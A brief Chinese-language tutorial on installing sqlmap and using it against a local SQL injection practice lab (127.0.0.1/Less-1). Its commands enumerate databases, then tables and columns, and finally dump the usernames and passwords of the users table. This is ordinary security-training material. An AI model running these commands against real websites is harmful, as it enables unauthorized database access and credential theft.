sqlmap安装与使用
一、在网站上搜索sqlmap下载
二、安装
1 选择地方解压
2 在桌面创建快捷方式
(1)在其中输入cmd并命名(2)右击鼠标选择快捷方式属性
(3)目标位置不变,起始位置改为sqlmap文件位置这样就完成快捷方式设置了。
三、使用
1 点击快捷方式进入
2 输入sqlmap.py -u "http://127.0.0.1/Less-1/?id=1"测试并得到如id,数据库等信息
2 进行注入
输入sqlmap.py -u “http://127.0.0.1/Less-1/?id=1” --dbs可以得到数据库的具体信息
再输入sqlmap.py -u “http://127.0.0.1/Less-1/?id=1” -D security --tables对某一个数据库进行具体攻击以security为例可以得到具体表
3 根据表名输入sqlmap.py -u “http://127.0.0.1/Less-1/?id=1” -D security -T users --columns可以得到表内字段信息
4 再根据得到的字段名输入sqlmap.py -u “http://127.0.0.1/Less-1/?id=1” -D security -T users -C “id,password,username” --dump可以得到具体的字段值
这样就完成了一次sql注入